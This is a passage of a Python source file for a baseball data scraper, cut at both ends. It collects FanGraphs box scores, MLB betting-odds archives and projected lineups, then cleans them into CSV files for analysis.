tables[date_index].iloc[1, -1]\r\n\r\n\t\tID = \"\"\r\n\t\ttemp = date.split(\"-\")\r\n\t\tfor values in temp:\r\n\t\t\tID = ID + values\r\n\r\n\t\tID = ID + numerise_string(home_team[0:2] + away_team[0:2])\r\n\r\n\t\tscores = pd.DataFrame(columns = [\"Home\", \"Home_Score\", \"Away\", \"Away_Score\", \"Date\", \"URL\", \"ID\"])\r\n\t\tscores.loc[0] = [home_team, home_score, away_team, away_score, date, url, ID]\r\n\r\n\r\n\t\t#Find where the extraction should begin\r\n\t\tstart = 0\r\n\t\tfor table in tables:\r\n\t\t\tstart += 1\r\n\t\t\tif str(type(table.columns)) == \"\":\r\n\t\t\t\tbreak\r\n\r\n\t\ttables = tables[start:]\r\n\r\n\t\t#Find the play by play table\r\n\t\ttable_lengths = []\r\n\t\tfor table in tables:\r\n\t\t\ttable_lengths.append(len(table))\r\n\r\n\t\ttable_lengths = np.array(table_lengths)\r\n\r\n\t\tplay_by_play_index = np.where(table_lengths == 
np.max(table_lengths))[0][0]\r\n\t\tplay_by_play = tables[play_by_play_index]\r\n\t\tdel tables[play_by_play_index]\r\n\t\ttable_lengths = np.delete(table_lengths, play_by_play_index)\r\n\r\n\t\t#Merge the frames\r\n\t\tmerged_tables = []\r\n\t\tfor i in range(0, 4):\r\n\r\n\t\t\ttemp_table = tables[i]\r\n\t\t\tfor j in range(4, len(tables)):\r\n\r\n\t\t\t\tsize = len(temp_table)\r\n\r\n\t\t\t\tif len(tables[j]) == size:\r\n\r\n\t\t\t\t\tcheck = len(np.where(tables[i][\"Name\"] == tables[j][\"Name\"])[0])\r\n\t\t\t\t\tif check == size:\r\n\r\n\t\t\t\t\t\ttemp_table = pd.merge(temp_table, tables[j], on = \"Name\")\r\n\r\n\t\t\ttemp_table[\"Date\"] = date\r\n\t\t\tif i % 2 == 0:\r\n\t\t\t\ttemp_table[\"Team\"] = home_team\r\n\t\t\t\ttemp_table[\"Location\"] = \"Home\"\r\n\t\t\t\ttemp_table[\"Opponent\"] = away_team\r\n\t\t\telse:\r\n\t\t\t\ttemp_table[\"Team\"] = away_team\r\n\t\t\t\ttemp_table[\"Location\"] = \"Away\"\r\n\t\t\t\ttemp_table[\"Opponent\"] = home_team\r\n\r\n\t\t\tcolnames = []\r\n\t\t\tfor j in range(0, len(temp_table.columns)):\r\n\t\t\t\tcolnames.append(temp_table.columns[j].split(\"_\")[0])\r\n\r\n\t\t\ttemp_table.columns = colnames\r\n\t\t\ttemp_table[\"ID\"] = ID\r\n\r\n\t\t\tmerged_tables.append(temp_table.loc[:,~temp_table.columns.duplicated()])\r\n\r\n\r\n\r\n\r\n\t\tmerged_tables.append(scores)\r\n\r\n\t\treturn merged_tables\r\n\r\n\r\n\r\n\t#Extracts the box scores based off the URL list\r\n\tdef Extract_FanGraphs_Box_Scores(self):\r\n\r\n\t\turl_path = self.paths[-1] + \"/Game_URLs.csv\"\r\n\t\tif path.exists(url_path):\r\n\r\n\t\t\turls = list(set(list(pd.read_csv(url_path)[\"URL\"])))\r\n\r\n\r\n\t\t\t#Checks for existing Box_Scores\r\n\t\t\tpath_to_check = self.paths[2] + \"/FanGraphs_Scores.csv\"\r\n\t\t\tif path.exists(path_to_check):\r\n\t\t\t\turls_done = list(pd.read_csv(path_to_check).drop_duplicates()[\"URL\"])\r\n\r\n\t\t\t\turls = [x for x in urls if x not in urls_done]\r\n\r\n\r\n\t\t\t#Initialise variables\r\n\r\n\t\t\tbat = []\r\n\t\t\tpitch = []\r\n\t\t\tscores = []\r\n\r\n\t\t\tcount = 0\r\n\t\t\tn = len(urls)\r\n\r\n\t\t\tprint(\"Extracting \" + str(n) + \" Box Scores...\")\r\n\t\t\t#e_time = round((((45/2) + 3) * n) / 60, 2)\r\n\t\t\t#print(\"Estimated running time:\" + \"\\t\" + str(e_time) + \" minutes\")\r\n\r\n\t\t\t#Loop throught URLs \r\n\t\t\tfor i in tqdm(range(0, n)):\r\n\r\n\t\t\t\turl = str(urls[i])\r\n\t\t\t\tcount += 1\r\n\t\t\t\ttry:\r\n\t\t\t\t\ttables = self.Scrape_FanGraphs_game_stats_by_url(url)\r\n\t\t\t\texcept:\r\n\t\t\t\t\ttime.sleep(random.randint(5,10))\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\tbat = update_frame(bat, tables[0].append(tables[1]))\r\n\t\t\t\tpitch = update_frame(pitch, tables[2].append(tables[3]))\r\n\t\t\t\tscores = update_frame(scores, tables[4])\r\n\r\n\t\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** ADDED GAME *****\")\r\n\t\t\t\tprint(scores.iloc[-1,:])\r\n\r\n\t\t\t\t#print(scores)\r\n\r\n\t\t\t\tif (count + 1) % 20 == 0 or url == urls[-1]:\r\n\r\n\t\t\t\t\tself.update_file(self.paths[0], \"FanGraphs_Box_Scores.csv\", bat)\t\r\n\t\t\t\t\tbat = []\r\n\r\n\t\t\t\t\tself.update_file(self.paths[1], \"FanGraphs_Box_Scores.csv\", pitch)\t\r\n\t\t\t\t\tpitch = []\t\t\t\t\t\r\n\r\n\t\t\t\t\tself.update_file(self.paths[2], \"FanGraphs_Scores.csv\", scores)\t\r\n\t\t\t\t\tscores = []\r\n\r\n\t\t\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** PROGRESS SAVED *****\")\r\n\r\n\t\t\t\tif url != urls[-1]:\r\n\t\t\t\t\ttime.sleep(random.randint(3, 
7))\r\n\r\n\r\n\r\n\r\n\t###########################################################\r\n\t#################### UPDATE CODES ########################\r\n\t###########################################################\r\n\r\n\r\n\t#MAIN FUNCTION\r\n\t#Scrapes within the interval [last_scrapped, today]\r\n\t#Update the Box_Scores\r\n\t#Clean the data if needed\r\n\tdef UPDATE_FanGraphs_Box_Scores(self):\r\n\r\n\t\tpath_check = self.paths[2] + \"/FanGraphs_Scores.csv\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_check)\r\n\r\n\t\ttemp = pd.read_csv(path_check)\r\n\t\tn = len(temp)\r\n\r\n\t\tfrm = temp[\"Date\"].max()\r\n\t\tto = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\r\n\t\tself.Get_FanGraphs_Game_URLs(frm, to)\r\n\t\tself.Extract_FanGraphs_Box_Scores()\r\n\r\n\t\tn_new = len(pd.read_csv(path_check))\r\n\t\tif n_new > n:\r\n\t\t\tself.Clean_Data()\r\n\t\telse:\r\n\t\t\tprint(\"No new Box Scores to scrape.\")\r\n\r\n\r\n\r\n\t#Extracts the box scores based off the URL list\r\n\tdef Extract_FanGraphs_Box_Scores_FROM_MISSING_MATCHES(self):\r\n\r\n\t\turl_path = self.paths[-1] + \"/Missing_Matches.csv\"\r\n\t\tif path.exists(url_path):\r\n\r\n\t\t\tfile_missing_urls = pd.read_csv(url_path)\r\n\r\n\t\t\turls = list(set(list(file_missing_urls[\"URL\"])))\r\n\r\n\t\t\t#Checks for existing Box_Scores\r\n\t\t\tpath_to_check = self.paths[2] + \"/FanGraphs_Scores.csv\"\r\n\t\t\tif path.exists(path_to_check):\r\n\t\t\t\turls_done = list(pd.read_csv(path_to_check).drop_duplicates()[\"URL\"])\r\n\r\n\t\t\t\turls = [x for x in urls if x not in urls_done]\r\n\r\n\r\n\t\t\t#Initialise variables\r\n\r\n\t\t\tbat = []\r\n\t\t\tpitch = []\r\n\t\t\tscores = []\r\n\r\n\t\t\tcount = 0\r\n\t\t\tn = len(urls)\r\n\r\n\t\t\tprint(\"Extracting \" + str(n) + \" Box Scores...\")\r\n\t\t\t#e_time = round((((45/2) + 3) * n) / 60, 2)\r\n\t\t\t#print(\"Estimated running time:\" + \"\\t\" + str(e_time) + \" minutes\")\r\n\r\n\t\t\t#Loop throught URLs \r\n\t\t\tfor i in tqdm(range(0, n)):\r\n\r\n\t\t\t\turl = str(urls[i])\r\n\t\t\t\tcount += 1\r\n\t\t\t\ttry:\r\n\t\t\t\t\ttables = self.Scrape_FanGraphs_game_stats_by_url(url)\r\n\t\t\t\texcept:\r\n\t\t\t\t\ttime.sleep(random.randint(5,10))\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\tbat = update_frame(bat, tables[0].append(tables[1]))\r\n\t\t\t\tpitch = update_frame(pitch, tables[2].append(tables[3]))\r\n\t\t\t\tscores = update_frame(scores, tables[4])\r\n\r\n\t\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** ADDED GAME *****\")\r\n\t\t\t\tprint(scores.iloc[-1,:])\r\n\r\n\t\t\t\t#print(scores)\r\n\r\n\t\t\t\tif count % 20 == 0 or url == urls[-1]:\r\n\r\n\t\t\t\t\tself.update_file(self.paths[0], \"FanGraphs_Box_Scores.csv\", bat)\t\r\n\t\t\t\t\tbat = []\r\n\r\n\t\t\t\t\tself.update_file(self.paths[1], \"FanGraphs_Box_Scores.csv\", pitch)\t\r\n\t\t\t\t\tpitch = []\t\t\t\t\t\r\n\r\n\t\t\t\t\tself.update_file(self.paths[2], \"FanGraphs_Scores.csv\", scores)\t\r\n\t\t\t\t\tscores = []\r\n\r\n\t\t\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** PROGRESS SAVED *****\")\r\n\r\n\t\t\t\tif url != urls[-1]:\r\n\t\t\t\t\ttime.sleep(random.randint(3, 7))\r\n\r\n\r\n\t###########################################################\r\n\t#################### DATA CLEANING #######################\r\n\t###########################################################\r\n\r\n\t#Cleans the bat, pitch and scores frames\r\n\tdef Clean_Data(self):\r\n\r\n\t\t#Create sub-repositories if they do not already exist\r\n\t\tsufix = \"/Clean_Data\"\r\n\r\n\t\tfor i 
in range(0, (len(self.paths) - 1)):\r\n\t\t\tpath_string = self.paths[i] + sufix\r\n\t\t\tif not path.exists(path_string):\r\n\t\t\t\tos.mkdir(path_string)\r\n\t\t\t\tprint(\"Create sub-directory at:\" + \"\\t\" + path_string)\r\n\r\n\t\tscores_path = self.paths[2] + \"/FanGraphs_Scores.csv\"\r\n\t\tif not path.exists(scores_path):\r\n\t\t\tsys.exit(\"No data to clean.\")\r\n\t\telse:\r\n\t\t\tscores = pd.read_csv(scores_path)\r\n\r\n\t\tscores.columns = [\"Team_Home\", \"Score_Home\", \"Team_Away\", \"Score_Away\", \"Date\", \"URL\", \"ID\"]\r\n\r\n\t\t#Load bat and pitch frames\r\n\t\tframes = []\r\n\t\tfor i in range(0,2):\r\n\r\n\t\t\tpath_string = self.paths[i] + \"/FanGraphs_Box_Scores.csv\"\r\n\t\t\tif not path.exists(path_string):\r\n\t\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_string)\r\n\t\t\telse:\r\n\t\t\t\tframes.append(pd.read_csv(path_string, dtype={'a': str})) \r\n\r\n\r\n\t\t#Use CITY abreviations for TEAMS\r\n\t\tscores = self.Fix_Team_Names(scores, \"City\")\r\n\t\tfor i in range(0,2):\r\n\t\t\tframes[i] = self.Fix_Team_Names(frames[i], \"City\")\r\n\r\n\r\n\t\t#Find double-matches days\r\n\t\tIDs = np.array(list(scores[\"ID\"]))\r\n\t\tdoubles = [x for x in IDs if len(np.where(IDs == x)[0]) > 1]\r\n\r\n\t\tif len(doubles) > 0:\r\n\r\n\t\t\tfix = list(set(list(doubles)))\r\n\r\n\t\t\tm = np.where(scores.columns == \"ID\")[0][0]\r\n\r\n\t\t\tfor values in fix:\r\n\r\n\t\t\t\tindex_scores = np.where(IDs == values)[0][1]\r\n\r\n\t\t\t\tfor i in range(0, 2):\r\n\r\n\t\t\t\t\tindex = np.where(frames[i][\"ID\"] == values)[0]\r\n\t\t\t\t\ttemp_names = frames[i].iloc[index, :][\"Name\"]\r\n\r\n\t\t\t\t\tsplit = np.where(temp_names == \"Total\")[0][1] + 1\r\n\t\t\t\t\tto_replace = index[split:]\r\n\r\n\t\t\t\t\tcol_index = np.where(frames[i].columns == \"ID\")[0][0]\r\n\r\n\t\t\t\t\tframes[i].iloc[to_replace, col_index] = -values\r\n\r\n\r\n\t\t\t\tscores.iloc[index_scores, m] = -values\r\n\r\n\r\n\t\t#Tag starting pitchers\r\n\t\tframes[1][\"Starting\"] = \"No\"\r\n\t\tIDs = list(scores[\"ID\"])\r\n\t\tfor i in tqdm(range(0, len(IDs))):\r\n\r\n\t\t\tID = IDs[i]\r\n\t\t\tindex_match = np.where(frames[1][\"ID\"] == ID)[0]\r\n\t\t\tif len(index_match) == 0:\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tteams = list(set(list(frames[1][\"Team\"][index_match])))\r\n\t\t\tfor team in teams:\r\n\t\t\t\tstarting = index_match[np.where(frames[1][\"Team\"][index_match] == team)[0][0]]\r\n\t\t\t\tframes[1].at[starting, \"Starting\"] = \"Yes\"\r\n\r\n\r\n\r\n\t\tfor i in range(0, 2):\r\n\r\n\t\t\tx = frames[i]\r\n\r\n\t\t\t#Remove \"Total\" rows\r\n\t\t\trmv = np.where(x[\"Name\"] == \"Total\")[0]\r\n\t\t\tx = x.drop(rmv).reset_index(drop = True)\r\n\r\n\r\n\t\t\t#The are NaNs due to ratios\r\n\t\t\t#Create dummy columns for NaNs\r\n\r\n\t\t\tn_NaNs = x.isna().sum()\r\n\t\t\tfix = np.where(n_NaNs > 0)[0]\r\n\t\t\tcols_to_fix = x.columns[fix]\r\n\r\n\t\t\tif len(fix) > 0:\r\n\t\t\t\tfor cnames in cols_to_fix:\r\n\r\n\t\t\t\t\t#Replace with 0\r\n\t\t\t\t\tcol_index = np.where(x.columns == cnames)[0][0]\r\n\t\t\t\t\tto_replace = np.where(x[cnames].isna())[0]\r\n\r\n\t\t\t\t\tif \"%\" in cnames or cnames == \"HR/FB\":\r\n\t\t\t\t\t\tx.iloc[to_replace, col_index] = \"0.0%\"\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tif x[cnames].dtype == np.float64:\r\n\t\t\t\t\t\t\tx.iloc[to_replace, col_index] = 0.0\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tx.iloc[to_replace, col_index] = 0\r\n\r\n\t\t\t\t\t#Add dummy column\r\n\t\t\t\t\tnew_name = cnames + \"_NaN\"\r\n\t\t\t\t\tx[new_name] = 0\r\n\r\n\t\t\t\t\tcol_index = 
np.where(x.columns == new_name)[0][0]\r\n\t\t\t\t\tx.iloc[to_replace, col_index] = 1\r\n\r\n\r\n\t\t\t#Format percentages\r\n\t\t\tdata_types = list(x.dtypes)\r\n\t\t\tfor j in range(0, len(x.columns)):\r\n\t\t\t\tif data_types[j] == np.float64 or data_types[j] == np.int64:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t\r\n\t\t\t\telse:\r\n\t\t\t\t\tm = x.columns[j]\r\n\r\n\t\t\t\t\tif (\"%\" in m and not \"NaN\" in m) or m == \"HR/FB\":\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tx[m] = x[m].str.replace(\"%\", \"\").astype(float) / 100\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tproblem = [k for k, x in enumerate(list(x[m])) if \",\" in x]\t\r\n\t\t\t\t\t\t\tindex_col = np.where(x.columns == m)[0][0]\r\n\t\t\t\t\t\t\tx.iloc[problem, index_col] = \"0.0%\"\r\n\r\n\t\t\t\t\t\t\tx[m] = x[m].str.replace(\"%\", \"\").astype(float) / 100\r\n\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tx[m] = x[m].astype(float)\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tcontinue\r\n\r\n\r\n\t\t\t#Fix column_names\r\n\t\t\tcolnames = list(x.columns)\r\n\t\t\tfor j in range(0, len(colnames)):\r\n\r\n\t\t\t\tif colnames[j][0] == \"-\":\r\n\t\t\t\t\tcolnames[j] = colnames[j][1:] + \"_minus\"\r\n\t\t\t\telif x.columns[j][0] == \"+\":\r\n\t\t\t\t\tcolnames[j] = colnames[j][1:] + \"_plus\"\t\t\r\n\r\n\t\t\tx.columns = colnames\t\t\r\n\r\n\r\n\t\t\t#Add position variable\r\n\t\t\t#Only for bat\r\n\t\t\ttry:\r\n\r\n\t\t\t\tsplitted_names = pd.DataFrame(list(x[\"Name\"].str.split(\" - \")), columns = [\"Name\", \"Position\"])\r\n\r\n\t\t\t\tx[\"Name\"] = (splitted_names[\"Name\"] + \" \" + x[\"Team\"]).str.replace(\" \", \"\")\r\n\r\n\t\t\t\ttemp = list(set(list(splitted_names[\"Position\"])))\r\n\r\n\t\t\t\tpositions = list()\r\n\t\t\t\tfor values in temp:\r\n\r\n\t\t\t\t\ty = values.split(\"-\")\r\n\t\t\t\t\tfor vals in y:\r\n\t\t\t\t\t\tif not vals in positions:\r\n\t\t\t\t\t\t\tpositions.append(vals)\r\n\r\n\t\t\t\tposition_names = []\r\n\r\n\t\t\t\tfor values in positions:\r\n\t\t\t\t\tc_name = \"Position_\" + values\r\n\t\t\t\t\tx[c_name] = 0\r\n\t\t\t\t\tposition_names.append(c_name)\r\n\r\n\r\n\t\t\t\tfor j in range(0, len(x)):\r\n\r\n\t\t\t\t\ty = splitted_names[\"Position\"][j].split(\"-\")\r\n\t\t\t\t\tfor values in y:\r\n\t\t\t\t\t\tc_name = \"Position_\" + values\r\n\t\t\t\t\t\tx.at[j, c_name] = 1\r\n\r\n\t\t\t\tframes[i] = x.sort_values(\"Date\", ascending=False)\r\n\r\n\t\t\texcept:\r\n\r\n\t\t\t\tsplitted_names = pd.DataFrame(list(x[\"Name\"].str.split(\"(\")), columns = [\"Name\", \"Position\"])\r\n\t\t\t\tx[\"Name\"] = (splitted_names[\"Name\"] + \" \" + x[\"Team\"]).str.replace(\" \", \"\")\r\n\t\t\t\tframes[i] = x.sort_values(\"Date\", ascending=False)\r\n\r\n\r\n\t\tscores = scores.sort_values(\"Date\", ascending = False)\r\n\t\tfor i in range(0, 2):\r\n\t\t\tframes[i] = frames[i].sort_values(\"Date\", ascending = False)\r\n\r\n\t\t#Save the cleaned files\r\n\t\tfor i in range(0, 2):\r\n\t\t\tsave_path = self.paths[i] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\t\tframes[i].to_csv(save_path, index = False)\r\n\t\t\tprint(\"Saved:\" + \"\\t\" + save_path)\r\n\r\n\t\tsave_path = self.paths[2] + \"/Clean_Data/FanGraphs_Scores.csv\"\r\n\t\tscores = scores.sort_values(\"Date\", ascending=False)\r\n\t\tscores.to_csv(save_path, index = False)\r\n\t\tprint(\"Saved:\" + \"\\t\" + save_path)\r\n\r\n\r\n\t\tprint(\"Cleaning done.\")\r\n\r\n\r\n\t#Cleans betting data\r\n\tdef Clean_Betting_Data(self):\r\n\r\n\t\t#Set sub-directory up\r\n\t\tpath_data = self.paths[3] + \"/Clean_Data\"\r\n\t\tif not 
path.exists(path_data):\r\n\t\t\tos.mkdir(path_data)\r\n\t\t\tprint(\"Created sub-directory at:\" + \"\\t\" + path_data)\r\n\r\n\t\t#Extract CSV files if needed\r\n\t\turl = \"https://www.sportsbookreviewsonline.com/scoresoddsarchives/mlb/mlboddsarchives.htm\"\r\n\t\thtml = requests.get(url).content\r\n\t\thtml_content = BeautifulSoup(html, 'lxml')\r\n\t\tlinks = html_content.findAll('a')\r\n\r\n\t\tfile_url = []\r\n\t\tfor link in links:\r\n\t\t\ttry:\r\n\t\t\t\thref = link.attrs['href']\r\n\t\t\texcept:\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tif \".xlsx\" in href:\r\n\t\t\t\tfile_url.append(str(\"https://www.sportsbookreviewsonline.com/scoresoddsarchives/mlb/\" + href))\r\n\r\n\r\n\t\tfor x in file_url:\r\n\r\n\t\t\tyear = x.split(\"%\")[-1].split(\".\")[0][2:]\r\n\t\t\tpath_save = self.paths[3] + \"/MLB_Odds_\" + str(year) + \".csv\"\r\n\t\t\tif not path.exists(path_save):\r\n\r\n\t\t\t\tfile = pd.read_excel(x)\r\n\t\t\t\tfile.to_csv(path_save, index = False)\r\n\t\t\t\tprint(\"Downloaded:\" + \"\\t\" + path_save)\r\n\r\n\r\n\r\n\r\n\t\tFG_teams = []\r\n\t\tFG_teams = np.array(FG_teams)\r\n\t\tall_teams = np.array(list(set(list(FG_teams))))\r\n\t\tteam_index = []\r\n\t\tfor teams in all_teams:\r\n\t\t\tteam_index.append(np.where(FG_teams == teams)[0])\r\n\r\n\r\n\t\t#Format the files\r\n\t\tframe = []\r\n\r\n\t\tfor i in tqdm(range(2010, (datetime.now().year + 1))):\r\n\r\n\t\t\tpath_check = self.paths[3] + \"/MLB_Odds_\" + str(i) + \".csv\"\r\n\t\t\tif path.exists(path_check):\r\n\r\n\t\t\t\ttemp = pd.read_csv(path_check).reset_index(drop = True)\r\n\r\n\t\t\t\t#Fix dates\r\n\t\t\t\ttemp[\"Date\"] = temp[\"Date\"].astype(str)\r\n\r\n\t\t\t\tfor j in range(0, len(temp)):\r\n\t\t\t\t\tu = temp.at[j, \"Date\"]\r\n\t\t\t\t\tif len(temp.at[j, \"Date\"]) == 3:\r\n\t\t\t\t\t\ttemp.at[j, \"Date\"] = str(i) + \"-\" + \"0\" + u[0] + \"-\" + u[1:]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\ttemp.at[j, \"Date\"] = str(i) + \"-\" + u[0:2] + \"-\" + u[2:]\r\n\r\n\r\n\t\t\t\t#Convert moneyline values to returns\r\n\t\t\t\tmoneylines = [\"Open\", \"Close\"]\r\n\r\n\t\t\t\trmv = np.where(temp[\"Open\"] == \"NL\")[0]\r\n\t\t\t\tif len(rmv) > 0:\r\n\t\t\t\t\ttemp = temp.drop(rmv)\r\n\t\t\t\t\ttemp = temp.reset_index(drop = True)\r\n\t\t\t\t\ttemp[\"Open\"] = temp[\"Open\"].astype(int)\r\n\t\t\t\t\ttemp[\"Close\"] = temp[\"Close\"].astype(int)\r\n\r\n\t\t\t\tfor vals in moneylines:\r\n\r\n\t\t\t\t\tm = np.where(temp.columns == vals)[0][0]\r\n\r\n\t\t\t\t\tindex = np.where(temp[vals] > 0)[0]\r\n\t\t\t\t\ttemp.iloc[index, m] = temp.iloc[index, m] / 100\r\n\r\n\t\t\t\t\tindex = np.where(temp[vals] < 0)[0]\r\n\t\t\t\t\ttemp.iloc[index, m] = 100 / (- temp.iloc[index, m])\t\t\t\t\t\t\t\t\t\r\n\r\n\r\n\t\t\t\tsplit_frames = []\r\n\t\t\t\tvalues = [\"H\", \"V\"]\r\n\t\t\t\ttemp = temp[[\"Date\", \"Team\", \"Open\", \"Close\", \"VH\", \"Final\", \"Pitcher\"]]\r\n\r\n\t\t\t\ttemp[\"Pitcher\"] = temp[\"Pitcher\"].str.replace(\"-L\", \"\").str.replace(\"-R\", \"\")\r\n\t\t\t\tfor j in range(0, len(temp)):\r\n\t\t\t\t\ttemp.at[j, \"Pitcher\"] = str(temp.at[j, \"Pitcher\"])[1:]\r\n\r\n\t\t\t\t#Translate team names\r\n\t\t\t\ttemp = self.Fix_Team_Names(temp, \"City\")\r\n\t\t\t\ttemp = temp.reset_index(drop = True)\r\n\r\n\r\n\t\t\t\tfor vals in values:\r\n\r\n\t\t\t\t\tindex = np.where(temp[\"VH\"] == vals)[0]\r\n\t\t\t\t\tsplit_frames.append(temp.iloc[index, :])\r\n\t\t\t\t\tdel split_frames[-1][\"VH\"]\r\n\r\n\t\t\t\t\tif vals == \"H\":\r\n\t\t\t\t\t\tsplit_frames[-1].columns = [\"Date\", \"Team_Home\", \"Open_Home\", \"Close_Home\", 
\"Score_Home\", \"Pitcher_Home\"]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tsplit_frames[-1].columns = [\"Date\", \"Team_Away\", \"Open_Away\", \"Close_Away\", \"Score_Away\", \"Pitcher_Away\"]\r\n\t\t\t\t\t\tdel split_frames[-1][\"Date\"]\r\n\r\n\t\t\t\t\tsplit_frames[-1] = split_frames[-1].reset_index(drop = True)\r\n\r\n\t\t\t\t#Assemble\r\n\t\t\t\ttemp = pd.concat(split_frames, axis = 1)\r\n\r\n\t\t\t\t#Compute implied odds\r\n\t\t\t\ttemp[\"Open_Winning_Odds_Home\"] = 1 / (1 + temp[\"Open_Home\"])\r\n\t\t\t\ttemp[\"Close_Winning_Odds_Home\"] = 1 / (1 + temp[\"Close_Home\"])\r\n\r\n\t\t\t\ttemp[\"Open_Winning_Odds_Away\"] = 1 / (1 + temp[\"Open_Away\"])\r\n\t\t\t\ttemp[\"Close_Winning_Odds_Away\"] = 1 / (1 + temp[\"Close_Away\"])\r\n\r\n\t\t\t\ttemp[\"Open_Winning_Odds_Home\"] = temp[\"Open_Winning_Odds_Home\"] / (temp[\"Open_Winning_Odds_Home\"] + temp[\"Open_Winning_Odds_Away\"])\r\n\t\t\t\ttemp[\"Close_Winning_Odds_Home\"] = temp[\"Close_Winning_Odds_Home\"] / (temp[\"Close_Winning_Odds_Home\"] + temp[\"Close_Winning_Odds_Away\"])\r\n\r\n\t\t\t\ttemp[\"Open_Winning_Odds_Away\"] = 1 - temp[\"Open_Winning_Odds_Home\"]\r\n\t\t\t\ttemp[\"Close_Winning_Odds_Away\"] = 1 - temp[\"Close_Winning_Odds_Home\"]\r\n\r\n\r\n\t\t\t\tif len(frame) == 0:\r\n\t\t\t\t\tframe = temp\r\n\t\t\t\telse:\r\n\t\t\t\t\tframe = frame.append(temp)\r\n\r\n\r\n\t\tframe = frame.iloc[::-1]\r\n\t\tframe = frame.reset_index(drop = True)\r\n\r\n\r\n\t\t#Attempt to add IDs\r\n\t\tpath_scores = self.paths[2] + \"/Clean_Data/FanGraphs_Scores.csv\"\r\n\t\tif path.exists(path_scores):\r\n\r\n\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** Adding IDs *****\")\r\n\r\n\t\t\tframe[\"ID\"] = 0\r\n\t\t\tscores = pd.read_csv(path_scores)\r\n\r\n\t\t\tfor i in tqdm(range(0, len(scores))):\r\n\r\n\t\t\t\ta = np.where(frame[\"Date\"] == scores.at[i, \"Date\"])[0]\r\n\t\t\t\tif len(a) == 0:\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\tb = np.where(frame[\"Team_Home\"][a] == scores.at[i, \"Team_Home\"])[0]\r\n\t\t\t\tif len(b) == 0:\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\ta = a[b]\r\n\r\n\t\t\t\tb = np.where(frame[\"Score_Home\"][a] == scores.at[i, \"Score_Home\"])[0]\r\n\t\t\t\tif len(b) == 0:\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\ta = a[b]\r\n\r\n\t\t\t\tb = np.where(frame[\"Score_Away\"][a] == scores.at[i, \"Score_Away\"])[0]\r\n\t\t\t\tif len(b) == 0:\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\tindex = a[b]\r\n\r\n\t\t\t\tif len(index) > 0:\r\n\t\t\t\t\tframe.at[index[0], \"ID\"] = scores.at[i, \"ID\"]\r\n\r\n\r\n\t\trmv = np.where(frame[\"ID\"] == 0)[0]\r\n\t\tif len(rmv) > 0:\r\n\t\t\tframe = frame.drop(rmv)\r\n\r\n\r\n\t\tframe.to_csv(self.paths[3] + \"/Clean_Data/MLB_Odds.csv\", index = False)\r\n\t\tprint(\"\\t\" + \"\\t\" + \"***** MLB Moneyline data successfully formated *****\")\r\n\r\n\r\n\r\n\tdef Build_Filling_Pitchers_Database(self):\r\n\r\n\t\tframe_path = self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tif not path.exists(frame_path):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + frame_path)\r\n\r\n\t\tframe = pd.read_csv(frame_path)\r\n\t\t\r\n\t\tindex = np.where(frame[\"Starting\"] == \"No\")[0]\r\n\t\tframe.loc[index, \"Name\"] = \"ReliefPitcher\" + frame.iloc[index][\"Name\"].str[-3:].copy()\r\n\r\n\t\tframe.to_csv(self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores_SP.csv\", index = False)\r\n\r\n\r\n\t##############################################################################\r\n\t#################### PREDICTED LINEUPS AND MONEYLINES 
#######################\r\n\t##############################################################################\r\n\r\n\tdef Scrape_Predicted_Lineups(self):\r\n\r\n\t\theaders = {\r\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n \t}\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\r\n\t\tprint(\"Accessing https://www.lineups.com/mlb/lineups ...\")\r\n\r\n\t\t#Extract projected roosters\r\n\t\thtml = requests.get(\"https://www.lineups.com/mlb/lineups\" , stream = True, headers = headers).content\r\n\t\ttables = pd.read_html(html)\r\n\t\tsoup = BeautifulSoup(html)\r\n\r\n\r\n\t\tprint(\"Extracting tables ...\")\r\n\t\t#Extract full player names\r\n\t\tplayers_hrefs = soup.find_all(\"a\", class_ = \"link-black-underline\")\r\n\t\tplayers = []\r\n\t\tfamily_names = []\r\n\t\tfor element in players_hrefs:\r\n\t\t\tif \"player-stats\" in element[\"href\"]:\r\n\r\n\t\t\t\ttemp = element[\"href\"].split(\"/\")[-1].split(\"-\")\r\n\t\t\t\tout = \"\"\r\n\t\t\t\tfor x in temp:\r\n\t\t\t\t\tout = out + x.capitalize()\r\n\r\n\t\t\t\tplayers.append(out)\r\n\r\n\t\t\t\tif temp[-1].capitalize() == \"Jr\":\r\n\t\t\t\t\tfamily_names.append(temp[-2].capitalize() + temp[-1].capitalize())\r\n\t\t\t\telse:\r\n\t\t\t\t\tfamily_names.append(temp[-1].capitalize())\r\n\r\n\r\n\t\tfamily_names 